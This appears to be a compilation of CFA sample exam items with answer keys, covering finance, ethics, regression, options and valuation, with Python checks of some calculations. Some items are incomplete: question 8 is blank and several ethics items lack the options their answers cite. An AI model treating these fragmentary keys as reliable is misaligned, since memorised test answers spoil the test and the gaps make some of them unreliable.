Both the VB and C# DynamicQuery samples include a source implementation of a helper library that allows you to express LINQ queries using extension methods that take string arguments instead of type-safe language operators. You can copy/paste either the C# or VB implementations of the DynamicQuery library into your own projects and then use it where appropriate to more dynamically construct LINQ queries based on end-user input.
You can use the DynamicQuery library against any LINQ data provider (including LINQ to SQL, LINQ to Objects, LINQ to XML, LINQ to Entities, LINQ to SharePoint, LINQ to TerraServer, etc). Instead of using language operators or type-safe lambda extension methods to construct your LINQ queries, the dynamic query library provides you with string based extension methods that you can pass any string expression into.
For example, below is a standard type-safe LINQ to SQL VB query that retrieves data from a Northwind database and displays it in an ASP.NET GridView.
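A minimal C# sketch of the idea: a type-safe query alongside its string-based dynamic equivalent. The DataContext class name here is illustrative, and the sketch assumes the DynamicQuery sample library is referenced via its System.Linq.Dynamic namespace:

```csharp
using System.Linq;
using System.Linq.Dynamic;   // from the DynamicQuery sample library

var db = new NorthwindDataContext();   // hypothetical DataContext name

// Standard type-safe LINQ to SQL query
var typedQuery = from p in db.Products
                 where p.CategoryID == 2
                 orderby p.ProductName
                 select p;

// Equivalent query constructed from strings at runtime
var dynamicQuery = db.Products
                     .Where("CategoryID == 2")
                     .OrderBy("ProductName");

GridView1.DataSource = dynamicQuery;
GridView1.DataBind();
```

Both forms translate to the same kind of SQL; the string-based form just defers the choice of columns and operators to runtime.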
Included with the above VB and C# Dynamic Query samples is some HTML documentation that describes how to use the Dynamic Query Library extension methods in more detail. It is definitely worth looking at if you want to use the helper library in more depth:
You can download and run basic VB and C# samples I've put together that demonstrate using the Dynamic LINQ library in an ASP.NET web-site that queries the Northwind sample database using LINQ to SQL:
You can use either Visual Web Developer 2008 Express (which is free) or VS 2008 to open and run them.
The dynamic query library is pretty simple and easy to use, and is particularly useful in scenarios where queries are completely dynamic and you want to provide end-user UI to help build them.
In a future blog post I'll delve further into building dynamic LINQ queries, and discuss other approaches you can use to structure your code using type-safe predicate methods (Joseph and Ben Albahari, authors of the excellent C# 3.0 In a Nutshell book, have a good post on this already here).
Hope this helps,
Scott
That´s nice, but how is it handled in LINQ to SQL? Is it possible to use sqlparameters, or does it prevent SQL injection in some other way in senarios like this:
.Where(String.Format("CategoryID={0}" & Request.QueryString["id"])
Thanks Scott, following you up on.
Hi Jonatan,
>>>>>> That´s nice, but how is it handled in LINQ to SQL? Is it possible to use sqlparameters, or does it prevent SQL injection in some other way in senarios like this: .Where(String.Format("CategoryID={0}" & Request.QueryString["id"])
Because the dynamic query library will inject the values as params that you pass separately, it protects against SQL injection attacks.
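A sketch of the difference (the column name and query string value are illustrative):

```csharp
using System.Linq.Dynamic;   // DynamicQuery sample library

// Risky: the user-supplied value is concatenated into the expression
// string itself, so the input gets parsed as part of the query text.
var risky = db.Products
              .Where("CategoryID = " + Request.QueryString["id"]);

// Safer: @0 is a placeholder in the dynamic expression language; the
// value is passed separately and is never parsed as query text.
var safer = db.Products
              .Where("CategoryID = @0", int.Parse(Request.QueryString["id"]));
```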
Thank you Scott!
I downloaded the C# Dynamic Query Library you gave. I found a nice example of DLinq in the path CSharpSamples\LinqSamples\DynamicQuery\DynamicQuery, and then I found a nice set of 101 examples in the path CSharpSamples\LinqSamples\SampleQueries covering LINQ in general. Just by running them in VS2008 Express I had all the examples for the different implementations of LINQ, like:
- Linq To Sql
- Linq to XML
- Linq over DataSet
- XQuery use cases
Great!
Great! So why is this a zip somewhere on MSDN that has a code file we need to compile? If this works as good as you say it does, please consider putting it in the Extensions release.
Thanks!
erm...
"One of the benefits of LINQ is that it enables you to write type-safe queries in VB and C#. "
and then you come with an example which precisely kills this benefit.
Why not use the example of concatenate Linq queries? (where you use one linq query in another one, which will be combined into 1 expression tree at runtime by the provider?)
Interesting stuff!! I'll have a closer look later.
Is this new? Or has it been around for a while and I just haven't noticed.
Hi Frans,
>>>>>> Why not use the example of concatenate Linq queries? (where you use one linq query in another one, which will be combined into 1 expression tree at runtime by the provider?)
As I said at the end of this post, my next dynamic linq post will cover using predicate methods to compose LINQ queries. This enables type-safe expression composition.
Thanks,
Hi Ben,
>>>>>>> Interesting stuff!! I'll have a closer look later. Is this new? Or has it been around for a while and I just haven't noticed.
Believe it or not it has been around awhile. :-) I believe it shipped in the samples in Beta2.
Hi Scott,
For interest I posted something on using the predicate approach, via the specification pattern back in August on my old blog: iancooper.spaces.live.com/.../cns!844BD2811F9ABE9C!451.entry
I'll probably update for the release version of LINQ at some point this month on the new blog as part of the series there on architecting LINQ applications.
Hey Scott,
Another great post. How's Part 5 of the MVC Series coming?
--Steve
Yesterday I published an article about dynamic Where- and OrderBy-clauses in LINQ to SQL. It covers function delegates, expression trees and the PredicateBuilder class from Joseph Albahari.
Interesting! Coding with LINQ Dynamic Query Library looks very similar to SubSonic ...
Thank you! I will spend some time on it.
Using this removes the real-time compiler checking of the syntax, doesn't it?
It looks more like a SubSonic query or NHibernate HQL...
Is it possible to combine a strongly typed Linq expression with a dynamic query?
For example, create your base query:
var query = from p in Northwind.Products
where p.CategoryID == 2
select p
and then append a dynamic order by to the query, something like
query.OrderBy = "SupplierId"
I prefer to use the strongly typed approach but as you said, not all scenarios allow this (custom sorting in particular), in which case it would be nice to still do the bulk of your LINQ in a strongly typed manner.
Any Silverlight 2.0 posts in the works?
Hi Scott:
You can read this post in spanish here:
thinkingindotnet.wordpress.com/.../dynamic-linqparte-1-usando-la-libreria-de-linq-dynamic
Good things,
Type-safe and prevent SQL injection.
I am looking forward to your next post....
Anyway thanks for sharing the information...
Regards
Felix
Hey Now Scott,
The libraries sure are a great resource.
Thx,
Catto
I have been playing with the Dynamic Query Library for a while now. However, I never could figure out a way to do joins, using this library.
What about a scenario where we let our users add their own custom columns to a table (SQL). Can we use Linq to query a table that has changed? Is there some kind of “Refresh” or something of that sort?
Scott, I think you meant to have the arguments w/o the call to String.Format like this:
.Where("CategoryID=@0", Request.QueryString["id"])
Using String.Format is just a fancier way to concatenate strings and its use can still lead to string injection attacks.
For example: .Where(String.Format("CategoryID={0}", "'X' OR Secrets=1"))
When you use the Dynamic API with the '@' parameters and specify arguments directly, the two are never concatenated together, so your arguments are kept isolated all the way through. A text variable's contents will never be misinterpreted as part of the query.
Hi Scott,
Linq is really great, for me the best thing since Object Oriented Programming (really!). However, this move I can't follow. Everything you are doing here (and _much_ more) can be done if you have combinable expressions. And that is not hard to implement. So why do you want us to return to the dark ages of glueing strings together to build a query, when you could have a fully typesafe, intellisensable solution that would look like:
if (!String.IsNullOrEmpty(catselect)) {
var oldwhereclause=whereclause;
whereclause = p => oldwhereclause(p) && p.Category.CATEGORYNAME==catselect;
}
var q =
from p in ...
.Where(whereclause) // don't really like this syntax here but it works..
Note that not only is my where clause now constructed typesafe, but also the tables needed for the query are changed, which would be troublesome in a string-glueing approach.
Cheers, Ferdinand Swaters (still on 2008 Beta 2)
Scott,
Sometime ago you mentioned about doing a post on how to use LINQ in a multi-tier enviroment, I would love to get into LINQ but can't see on how this could work. Would very much appreciate if you could comment on that.
Thanks in advance
Shloma
Thanks for this addition, too:
.Where(String.Format("CategoryID={0}" & Request.QueryString["id"])
.Where(String.Format("CategoryID=@0", Request.QueryString["id"])
--rj
Hmm, try this: the link comes out better. It's the overview from my latest series on LINQ: codebetter.com/.../architecting-linq-to-sql-applications-part-4.aspx
Thanks Scott!
Is it possible to get the following behavior with this library (Like statement "%")? I am having trouble getting it to work.
Dim _Course = From p In University.Courses _
Where p.Course_Name.StartsWith("B") _
Select p
Is LINQ to SQL suitable for multi-tier apps? I've read on various sites that LINQ to SQL lacks multi-tier capabilities. Is this true? Are you still planning a blog to cover multi-tier using LINQ to SQL?
Great stuff, but isn't the example dynamic query library already included in System.Web.Query.Dynamic? Any idea why the classes in that namespace are not public?
Andrew
I don't think your Dynamic LINQ is very good. I think we can use lambda expression trees to create dynamic LINQ better.
Hi Scott, welcome to China. :)
Welcome to China. :) :) :) :) :) :)
HI man,welcome to china!
Welcome to China ;-)
Welcome to China.
What would be sweet is some kind of Predicate textbox that would do Intellisense for the user by understanding the parms, types and operators the dev "sets" for the textbox.
Hi Stefan,
>>>>>> Yesterday I published an article about dynamic Where- and OrderBy-clauses in LINQ to SQL.
That is a great article. Pointing others at it in case they missed it:
Hi Kris,
>>>>>>> Is it possible to combine a strongly typed Linq expression with a dynamic query?
Yes - you can mix both strongly typed queries and the dynamic string based queries together, which is quite nice and useful.
Hi Kevin,
>>>>>>> Any Silverlight 2.0 posts in the works?
Yep - I am just getting ready to start posting heavily on Silverlight 2.0. :-)
Hi Felix,
>>>>>>...
I haven't posted on M:M relationships yet. Here is a blog post that discusses it a little though: blogs.msdn.com/.../how-to-implement-a-many-to-many-relationship-using-linq-to-sql.aspx
Hi Ferdinand,
>>>>>>> Linq is really great, for me the best thing since Object Oriented Programming (really!). However, this move I can't follow. Everything you are doing here (and _much_ more) can be done if you have combinable expressions
This post is part 1 of 2. In the second part I'm going to discuss using combined expressions and predicate builders to do type-safe query composition.
Hi Shloma,
>>>>>>> Sometime ago you mentioned about doing a post on how to use LINQ in a multi-tier enviroment, I would love to get into LINQ but can't see on how this could work. Would very much appreciate if you could comment on that.
I still need to write a post on this with LINQ to SQL. It is on my list of things to-do (unfortunately it is a big list though!).
Sorry!
Hi Trent,
>>>>>>> Is it possible to get the following behavior with this library (Like statement "%")? I am having trouble getting it to work.
You can use .StartsWith(), .EndsWith() and .Contains() to get functionality similar to the like statement with SQL.
Hi Andrew,
>>>>>>> Great stuff, but isn't the example dynamic query library already included in System.Web.Query.Dynamic? Any idea why the classes in that namespace are not public?
Yep - this functionality is included for the LinqDataSource control in ASP.NET. Unfortunately the LINQ team didn't have time to fully design the dynamicquery library to the extent they felt comfortable shipping it as a broadly generic library in the framework with .NET 3.5 - which is why it is currently shipped as a source sample.
Welcome to China
Good article Scott, as always.
I've been looking at using the CLR in SQL Server to get round problems with dynamic queries in stored procedures. I haven't seen much on the use of LINQ within SQL Server itself. Are you aware of any problems and would I be able to use the Dynamic Query Library there as well?
Thanks, Simon
Maybe I could bribe you with something to push this one up the list a bit :)...
Anyway your posts are very much welcome, I love your writing style and to-the-point approach!
Enjoy
Thanks Scott, really nice post!!
In your code what is NorthwindDataContext?
Impressive! This is far easier than lambda expressions for building complex and/or search queries. The only thing keeping me from dropping Gentle and using Linq all the way is Oracle support. I hope Core Lab, OpenLink, DataDirect or Oracle will support Linq to Sql soon (without having to use the Entity Framework :). Do you have some info about this?
By the way, for those lambda fans:
I really like where you are going with these examples Scott. I've been looking through some of the LINQ documentation and I find changes in the way people are accessing the data in their DataContext. Sometimes they use something like 'from n in src.records' and sometimes they use 'src.records.select'. I was wondering what the real difference is in the two and what the trade offs of using either would be?
I made my own little example of some timing to see which would be faster for a simple select. I am consistently finding that the 'from n in src.records' is much faster than the other type.
///////////////////////
// Code Snippet
//////////////////////
[DllImport("kernel32.dll")]
extern static short QueryPerformanceCounter(ref long x);

[DllImport("kernel32.dll")]
extern static short QueryPerformanceFrequency(ref long x);
long start2 = 0, end2 = 0;
QueryPerformanceCounter(ref start2); // start timer
var visitors2 = from v in SrcContext.visitors where v.active == true select v;
QueryPerformanceCounter(ref end2); // end timer
long start1 = 0, end1 = 0;
QueryPerformanceCounter(ref start1); // start timer
var visitors1 = SrcContext.visitors.Select(c => c.active == true);
QueryPerformanceCounter(ref end1); // end timer
// retrieve frequency
long freq = 0;
QueryPerformanceFrequency(ref freq);
double total1 = (end1 - start1) * 1.0 / freq;
double total2 = (end2 - start2) * 1.0 / freq;
////////////////
// End
Has anybody tried it on DataTables? I tried it, but I think I did something wrong or it is not supported.
Thanks for any help!
Evert
Does anyone have any examples of how to use the dynamic query on XML instead of SQL? It would be great if there is an example of how to apply an orderby and allocate the type of the orderby dynamically as well with the source being XML.
This is great. I'm glad you've done it, you saved me from updating my dynamic querying library to work with Linq.
I can't find the namespace of those extension methods though, where do they live?
Paymon
Dim values = From t1 In MyTables.Table1 _
             Join t2 In MyTables.Table2 On t1.ID Equals t2.ID _
             Select t1, t2

How do I dynamically order this query?
"Operator '==' incompatible with operand types 'Guid?' and 'Guid'"
what am i doing wrong here?
Guid? SiteID = ((COM_Site)(cmbSectiesDynamic.SelectedItem)).ID;
List<Employee> employeeList = this.m_databaseContext.Employees.Where("SiteID ==@0",SiteID).ToList();
i don't get it..
@Paymon
You need to copy paste the Dynamic.cs class into your project.
You can find this class in the examples or here:
tomvangaever.be/.../Dynamic.cs
when you add this class to your solution you can enter:
using System.Linq.Dynamic;
and there you go :)
Does anyone know why this nullable Guid doesn't want to work...?
.Tom
Tom - the "Operator '==' incompatible with operand types 'Guid?' and 'Guid'" issue looks like a bug in System.Linq.Dynamic.
See this thread: forums.microsoft.com/.../ShowPost.aspx
I'm not totally sure if this is a good thing. The great benefit of the 'old' LINQ is the fact that it's strongly typed. In the early .NET days we had typed datasets, which have been replaced with the much better LINQ to SQL. LINQ already provides joining, grouping and filtering.
I can already do: db.Products.Where(p => p.Category.CategoryName == "Beverages");
In a production environment 'dynamic' queries don't exist, because all queries are constructed based on contextual arguments. There's nothing dynamic about categoryid (which in your example is filtered on the value '2'). It's not as if, when I suddenly pass a URL parameter SupplierID=5, it gets included in the query.
So all queries are predetermined. My example can easily be changed into db.Products.Where(p => p.Category.CategoryID == Request.QueryString["CatID"]);. Using the MVC web application, CatID is even processed by the controller and passed as a strongly typed (validated) parameter to the data layer (Models).
Back in the classic ASP days late binding was normal. These days we use strongly typed code so the compiler can warn us about any typos we might have made. Very important for beginning programmers.
And even LINQ itself can be used to 'dynamically' construct a query. Let's say an admin user wants to filter the product list. The UI provides him (even better, her ;-) with dropdowns for category and supplier and a textbox for entering a minimum unit price. Most databases only use positive IDs for primary keys, so a returned (form) value of -1 means no selection has been made. UnitPrice has been defined as double? (nullable).
IQueryable<Product> products = northwind.Products; // just initializing the query

if (categoryId > -1)
    products = products.Where(p => p.Category.CategoryID == categoryId); // Where() returns a new query, so reassign

if (supplierId > -1)
    products = products.Where(p => p.Supplier.SupplierID == supplierId);

if (unitPrice != null)
    products = products.Where(p => p.UnitPrice >= unitPrice);

DataGrid.DataSource = products;
DataGrid.DataBind(); // the database query is performed here
'Dynamic' queries will usually be built in a similar way, except products would then be a string. A string which can easily contain typos, or assign a number to a text field. Those issues present themselves only at runtime.
So again, what's the benefit of using late-bound, non-typed data queries? It's almost like I'm back in the classic ASP days. Like you said, you can rewrite a strongly typed LINQ query into a late-bound query. But I don't see the point of doing that.
Maybe you presented me a 'wrong' example of using dynamic LINQ queries, but for now I only see downsides.
Can one dynamically assign a TABLE name at run time? e.g.
var query = from c in db.stringVariableHoldingTableName
I know the above WON'T work, but it illustrates (I think) what I am trying to accomplish.
I have tables that have information about the other tables, which allow me to change the behavior of the program (in some respects) by changing the database/tables ... but this only works if I can set the table name on the fly.
How can you handle null values with the LINQ data source control? For example I have a drop down list that controls the data displayed in a gridview.
<asp:DropDownList ...>
    <asp:ListItem></asp:ListItem>
</asp:DropDownList>
<asp:LinqDataSource ...>
    <WhereParameters>
        <asp:ControlParameter ... />
    </WhereParameters>
</asp:LinqDataSource>
With the SQL datasource, I could use "categoryId=@categoryId OR @categoryId IS NULL" as my WHERE clause so that I could show all records when the "blank" item was selected from the drop down or only the specified item category if one was selected.
With the LINQ datasource I can't get this to work. If I specify "AutoGenerateWhereClause=true" it works when the "blank" item is selected but does not work for the other categories because my categoryId is a GUID. If I specify my own WHERE clause as "categoryId.ToString() = @categoryId" it works fine for everything but the "blank" item.
Is it poor design on my part or I am missing something with LINQ?
Hi,
I used the Dynamic Query API in order to embed code in XAML... Have a look...
marlongrech.wordpress.com/.../embed-code-in-xaml
Great JOB you guys!!!!!
Hi scott
sometimes I want to search the database like this:

var query = from p in db.Customers
            where p.City.Contains("Lon")
            select p;

but how do I change this expression to a dynamic LINQ expression?

var query = db.Customers.Where("City like @0", "Lon"); // this doesn't work
I find it annoying that you can't "refresh" a table block in the Linq to SQL designer window. I mean, if I change a field in the DB, I would like to be able to get that change into the designer. Now I have to delete the table and then add it again.
A number of folk have written to me in response to my 3rd tutorial asking that I spend some time focusing | http://weblogs.asp.net/scottgu/archive/2008/01/07/dynamic-linq-part-1-using-the-linq-dynamic-query-library.aspx | crawl-001 | refinedweb | 3,897 | 65.83 |
TimetableSDK
Simple SDK for macOS, iOS and watchOS that allows you to get the data you need from timetable.spbu.ru.
Requirements
- Swift 3
- iOS 8.0+
- macOS 10.10+
- tvOS 9.0+
- watchOS 2.0+
Installation
CocoaPods
For the latest release in CocoaPods add the following to your
Podfile:
use_frameworks!

pod 'TimetableSDK'
Swift Package Manager
Add TimetableSDK as a dependency to your
Package.swift. For example:
let package = Package(
    name: "YourPackageName",
    dependencies: [
        .Package(url: "", majorVersion: 3)
    ]
)
Usage
You can use the SDK for getting data directly from timetable.spbu.ru:
import TimetableSDK

let timetable = Timetable()

timetable.fetchDivisions() { result in
    switch result {
    case .success(let divisions):
        let physics = divisions[19]
        print(physics.name) // "Физика"
        physics.fetchStudyLevels() { result in
            switch result {
            case .success(let studyLevels):
                // ...
            case .failure(let error):
                print(error)
            }
        }
    case .failure(let error):
        print(error)
    }
}
Or — if you want to just test your app and don't need networking — the data can be deserialized from JSON files:
import Foundation
import TimetableSDK

let timetable = Timetable()

let url = Bundle.main.url(forResource: "divisions", withExtension: "json")!
let jsonData = try! Data(contentsOf: url)

timetable.fetchDivisions(using: jsonData) { result in
    // ...
}
You can specify a dispatch queue if you need to:
import Dispatch
import TimetableSDK

timetable.fetchDivisions(dispatchQueue: .global(qos: .background)) { result in
    // ...
}
You can use promises!
import TimetableSDK
import PromiseKit

let timetable = Timetable()

timetable.fetchDivisions().then { divisions -> Promise<[StudyLevel]> in
    let physics = divisions[19]
    print(physics.name) // "Физика"
    return physics.fetchStudyLevels()
}.then { studyLevels in
    // ...
}.catch { error in
    print(error)
}
Contributing
In order to generate an Xcode project for TimetableSDK execute the following command in the root directory of the project:
$ swift package generate-xcodeproj
Releases
3.1.2 - May 9, 2017
- Set DateFormatters' locale to "en_US_POSIX". This prevents those formatters from returning nil when converting a string to Date.
3.1.1 - Apr 17, 2017
- Fixed not setting the studentGroup property for fetched next and previous weeks.
3.1.0 - Apr 8, 2017
- Now when calling a fetching method, you can disable force reloading. I.e. if something has already been fetched and saved to a property of a class that provides the fetching method, calling that method with forceReload: false returns the contents of that property.
- You can now fetch extracurricular events for a division (currently Liberal Arts and Science only).
3.0.0 - Mar 19, 2017
Dropped Alamofire and DefaultStringConvertible dependencies.

The Result type is now implemented as follows:

public enum Result<Value> {
    case success(Value)
    case failure(TimetableError)
}
2.2.0 - Mar 7, 2017
Implemented features:
- Created Address and Room entities.
- Location can now fetch the room that it refers to, if one can be found (which is not guaranteed even if there actually is such a room, but its address does not match exactly to the location's address).
- Some docs fixed.
- Fixed not setting the timetable property for some entities.
- Event and Location were made classes.
CodePlex - Project Hosting for Open Source Software
Hi,
Please let me know the namespace that I need to include in my project for displaying messages using Messagebox in white.
In Windows Forms applications in C#.NET we use System.Windows.Forms.
What is the equivalent one in white.
Thanks,
Kavin
Hi
you can also use Message boxes from Forms, but as far as I know, you had to use it this way:
using MessageBox = System.Windows.Forms.MessageBox;
MessageBox.Show("Hello");
or
System.Windows.Forms.MessageBox.Show("Hello")
because there are multiple definitions if you include some White namespaces and Windows.Forms
I have tried both, and it works, but why do you want to pop up a message box?
Throndorin
I have put my code in the Try catch block. Hence if an exception occurs I wanted to display a message using Message Box.
When I tried to put using System.Windows.Forms in the beginning of the file the code does not compile at all. It gives the warning message.
"Application is an ambiguous reference between 'White.Core.Application' and 'System.Windows.Forms.Application.
Hence after reading your suggestion I used System.Windows.Forms.MessageBox.Show("File is not Found") and it worked fine.
Maybe System.Diagnostics.Trace would be a good alternative to MessageBox, so you don't break your test flow.
> Hi Glen.
> Sorry for the text; I am learning. :)

Also, next time you reply try using 'Reply All' - then it will be posted to the list and me, *insert witty quote about more people being better than one here*.

> To be more specific about my dilemma.....
> 1. Is a function like EndSituation() complete, or do I need to place
> anything after calling it, that is, to make sure that it works. If it can
> stand by itself, I think I know how to use it.

I'm not sure, it would really depend on what EndSituation exactly does. Perhaps a few test runs could help you figure it out? Things like the position of your plane, the landscape, things regarding the default values for the situation would need to be preserved somewhere - but that should all be within the function. I'd try it out.

> 2. the lack of docs referred to those that come with the game.

Ah. Probably a silly question but have you tried 'print EndSituation.__doc__'? That could help :) If all the functions have docstrings (.__doc__ attributes) then you can cook up a little loop that will print out all the documentation for you. The way to do this is using the built-in dir function which when called returns a list of all the current objects in the namespace. If that's just a whole bunch of gibberish, then we can help you out :)

> 3. It seems that once the function LoadMetar() is called, it stays in the
> program. My dilemma is that the script in which this function resides is run
> once within the program. So, it seems, that when a brand new situation is
> loaded from the program, the same script is loaded, but this time it has to
> check for some flag that resets the LoadMetar().

I think I'm starting to understand what you mean. The problem is that the script cannot really call itself from within itself?
I don't think that would be the behaviour of EndSituation - more likely the function halts the current situation and restarts with a new one (perhaps a clone of the old) but it wouldn't call the script from the beginning again.

Is there a way to ask for user input once within the program? If you can, then a simple command from the user could invoke EndSituation and the results could be observed directly. If not, try altering your script to something like...

def Main(dt):
    global metarFlag
    if (metarFlag == 0):
        LoadMetar("Metar\InfoMetar.txt")
        NoticeToUser(" loading InfoMetar Weather v1.0", 10.0)
        metarFlag = 1
    NoticeToUser(" Ending the situation, look out!", 10.0)  ## what does this number do?
    EndSituation()  ## does EndSituation take any arguments?

> The good thing about trying to explain this is that it's helping me
> figure out the problem more clearly. :)

Good luck!

Glen
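The run-once flag pattern being suggested can be sketched outside the simulator. LoadMetar and NoticeToUser below are stand-ins for the game's own functions (their real signatures are assumed), stubbed out so the control flow is runnable on its own:

```python
# Stand-alone sketch of the run-once flag pattern from the thread.
# LoadMetar / NoticeToUser are the flight simulator's functions; here they
# are stubbed so we can watch what happens over several frames.
calls = []

def LoadMetar(path):
    calls.append(("LoadMetar", path))

def NoticeToUser(message, seconds):
    calls.append(("NoticeToUser", message))

metarFlag = 0

def Main(dt):
    global metarFlag
    if metarFlag == 0:
        LoadMetar("Metar/InfoMetar.txt")
        NoticeToUser("loading InfoMetar Weather v1.0", 10.0)
        metarFlag = 1  # never load the METAR file again this session

# the simulator would call Main() every frame; simulate three frames:
for frame in range(3):
    Main(0.016)

print(calls)  # LoadMetar and NoticeToUser each appear once despite three frames
```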
Introduction to Azure Functions
Introduction to Input Bindings
Contents
Course Introduction
Azure Functions & Triggers
Output Bindings
Input Bindings
Durable Functions
Course Summary
This course is an introduction to Azure Functions. It explains how Azure Functions are little bits of your application logic that live in the cloud. The course includes how to activate—or what we call trigger—your Azure Functions, how to pass data to and from them, and also how to tie different Azure Functions together using an extension of Azure Functions called Durable Functions.
This course provides hands-on demonstrations of how to create different kinds of Azure Functions, how to create bindings to other Azure Services from those functions, and how to create a Durable Function to manage state from one Azure Function to the next.
If you have any feedback related to this course, please contact us at [email protected].
Learning Objectives
- Create Azure Functions with different types of Triggers
- Implement input and output bindings to different types of data resources
- Create Durable Functions to orchestrate related Azure Functions
- Log the results with Dependency Injection
Intended Audience
Software developers who want to learn how to implement Azure Functions as a part of their cloud software design.
Prerequisites
To get the most out of this course, you should have some experience with the following:
- Event-driven programming
- Servers and APIs
- Coding with C# and JSON
- Project creation in Visual Studio
Resources
The GitHub repository for this course can be found here.
For input bindings, you'll see in a moment that when using .NET, you just define the data types using function parameters in the typical way. For example, as your argument for an inbound stream, such as from a BLOB, you would use type stream from the standard System.IO namespace, while for the inbound text coming from a queue trigger you would use a string argument. You can also use any custom type of your choice as an argument to de-serialize input to that object type.
For dynamically typed languages, such as JavaScript, you would need to set the dataType property in the function.json file as a part of that binding definition. For example, to read stream input from a BLOB, set the dataType to stream, like you see here.
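The on-screen example is not reproduced in this transcript. A minimal function.json sketch of a blob trigger binding with dataType set to stream might look like the following (the name, path, and connection values here are illustrative, not the course's exact file):

```json
{
  "bindings": [
    {
      "name": "myBlob",
      "type": "blobTrigger",
      "direction": "in",
      "path": "samples-workitems/{name}",
      "connection": "AzureWebJobsStorage",
      "dataType": "stream"
    }
  ]
}
```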
Other options for dataType are byte array, binary, and string. So this time let's go back into our Azure Function inside Visual Studio so we can see an example of how we employ the use of an input binding as an argument. | https://cloudacademy.com/course/introduction-to-azure-functions-990/introduction-to-input-bindings/ | CC-MAIN-2021-31 | refinedweb | 435 | 54.66 |
Stefan Seefeld wrote:
- Decoupling DU build procedures from DU installation procedures
also implies delegating control of building and installing to separate scripts (e.g. 'build.py', 'install.py'), rather than having a single 'setup.py' script doing double duty.
As others already pointed out, what you suggest doesn't really change anything: 'setup.py' is just a facade to access distutils' functionality. building and installing *is* already controlled by two distinct objects ('commands').
Superficially this may sound like it's creating more(!) work for module developers, but bear in mind my goal of making these scripts more generic so that in most cases the module developer can simply [re]use existing ones rather than have to code new versions each time.
what do you want to reuse that you can't right now ?
The 'setup.py' [or whatever you want to call it] script. Reduce the amount of code the module developer needs to write. For simple modules and packages, this could (and should) be zero.
However, in order for 'build' and 'install' to work smoothly together, they both have to respect some conventions, for example use some common metadata format to share information about the things to be installed.
Of course.
My point is that some of this data shouldn't be in the setup scripts, and at least some of the rest should be automatically determined by the system rather than specified by the user (unless they need to override the automatics):
- Put metadata (by which I mean information describing the module/package itself; its name, version, author, dependencies, etc) into a standard metadata file, e.g. meta.txt, within the package.
- Put data/code used to build the distro into a build.py script. Put data/code used to install the distro into a install.py script.
i.e. There should be a clear distinction made between information describing the module and information used merely in building/installing it (custom paths, framework bindings, etc). These are two very different things and should be handled accordingly. [Note: any time I say 'metadata' I'm referring to the former, not the latter.]
With DU1, all this data is squidged into setup.py. This is suboptimal: it's not very convenient to read/edit, and there's some unnecessary duplication of metadata occurring over the build/install process as some of this data gets duplicated into PKG-INFO (which'd be unnecessary if it was put into a meta.txt file in the first place).
Often the only unique information stored in setup.py is said 'metadata', which is really a suboptimal arrangement. (Plus stuff like sub-package names, which can and should be gotten rid of in most, if not all, cases.)
Maybe a practical example'd help:
Current:
from distutils.core import setup

setup(name = 'HTMLTemplate',
      version = '0.4.3',
      description = 'HTML templating engine.',
      author = 'HAS',
      author_email = '', # see Manual.txt
      url = '',
      license = 'LGPL',
      platforms = ['any'],
      long_description = 'HTMLTemplate converts XML/HTML/XHTML templates ...',
      py_modules = ['HTMLTemplate'],
      )
Suggested:
- meta.txt
version 0.4.3
description HTML templating engine
author HAS
author email
url
license LGPL
platforms any
long description HTMLTemplate converts XML/HTML/XHTML templates ...
- install.py
#!/usr/bin/env python
from DU2 import install

install()
- build.py
#!/usr/bin/env python
from sys import argv
from DU2 import build

build(argv[1], omit='.pyc$')
Eliminating unnecessary duplication means the name shouldn't need to be declared more than once (i.e. the package folder name). The py_modules value is, by default, unnecessary. PKG-INFO is obsolete. README can be auto-generated (though I kinda wonder just how useful this really is and if it could be eliminated altogether). Both install.py and build.py are generic scripts: the former can be automatically inserted into the distro, the latter run from the shell as a standard build script.
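To show how little machinery the proposed meta.txt format needs, here is a sketch of a reader for it. The format and its key names come from the example above; since keys such as "long description" themselves contain spaces, the sketch matches lines against a known-key list, most specific keys first. This is illustrative only - DU2 and the format are the proposal, not real distutils APIs.

```python
# Sketch of a reader for the proposed meta.txt format (hypothetical).
# Keys that contain spaces are matched against a known-key list,
# checked most-specific first so "long description" wins over "description".
KNOWN_KEYS = ("long description", "author email", "version", "description",
              "author", "url", "license", "platforms")

def read_meta(lines):
    """Parse the proposed key-value format from an iterable of lines."""
    meta = {}
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        for key in KNOWN_KEYS:
            if line.startswith(key):
                meta[key] = line[len(key):].strip()
                break
    return meta

sample = """\
version 0.4.3
description HTML templating engine
author HAS
license LGPL
long description HTMLTemplate converts XML/HTML/XHTML templates ...
"""
meta = read_meta(sample.splitlines())
print(meta["version"], meta["license"])  # 0.4.3 LGPL
```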
It'll still scale up just as well as DU1, so that's not a concern. The aim here is to handle the simplest and [presumably] most common cases more cleanly.
HTH
has | https://mail.python.org/archives/list/[email protected]/message/YBT5GDHSNAE3CB4DWFM2TTSCQWOFKMK4/ | CC-MAIN-2022-05 | refinedweb | 673 | 57.98 |
These sample questions were developed.
1. According to the AIMR Code of Ethics, members must practice, and encourage others to practice, in a professional and ethical manner that will:
A. reflect credit on members and their profession.
B. add value for clients, prospects, employers, and employees.
C. maintain the excellent reputation of AIMR and its members.
D. encourage talented and ethical individuals to enter the investments profession.
2. The AIMR Standards of Professional Conduct state that a financial analyst shall not, when presenting material to others, "copy or use in substantially the same form, material prepared by another person without acknowledging its use and identifying the name of the author or publisher of such material." The analyst, however, may use information from other sources without acknowledgment if the information:
A. includes the analyst’s own conclusions.
B. is only being reported in a one-to-one client presentation.
C. is only being reported to the analyst’s employer or associates.
D. is factual information published in recognized financial and statistical reporting
services.
3.:
A. reflects the mosaic theory.
B. violates confidentiality rules.
C. violates insider trading rules.
D. reflects the misappropriation of information theory.
4. According to the AIMR Standards of Practice Handbook, AIMR members are permitted to:
A. depend on coworkers, who are AIMR members, to fulfill the obligation of informing employers of the Code and Standards.
B. use in research reports, without acknowledgement, materials prepared by an AIMR member employed by another company.
C. be excused for a lack of knowledge of the laws and regulations of countries in which they provide investment services, but not of the country in which they live and work.
D. waive the requirement to inform their employer, in writing, that AIMR members are obligated to comply with the Code and Standards, if the employer has acknowledged, in writing, adoption of the Code and Standards.
5. An analyst gathered the following data:
63.5 96.9 112.3 134.1
66.4 98.3 116.2 138.5
75.6 99.5 116.9 139.8
77.5 100.7 118.3 140.7
84.4 102.0 122.0 143.0
87.6 105.5 122.2 153.9
89.9 108.4 124.5 155.5
In constructing a frequency distribution using five classes, if the first class is "60 up to 80," the class frequency of the third class is:
A. 4.
B. 5.
C. 6.
D. 8.
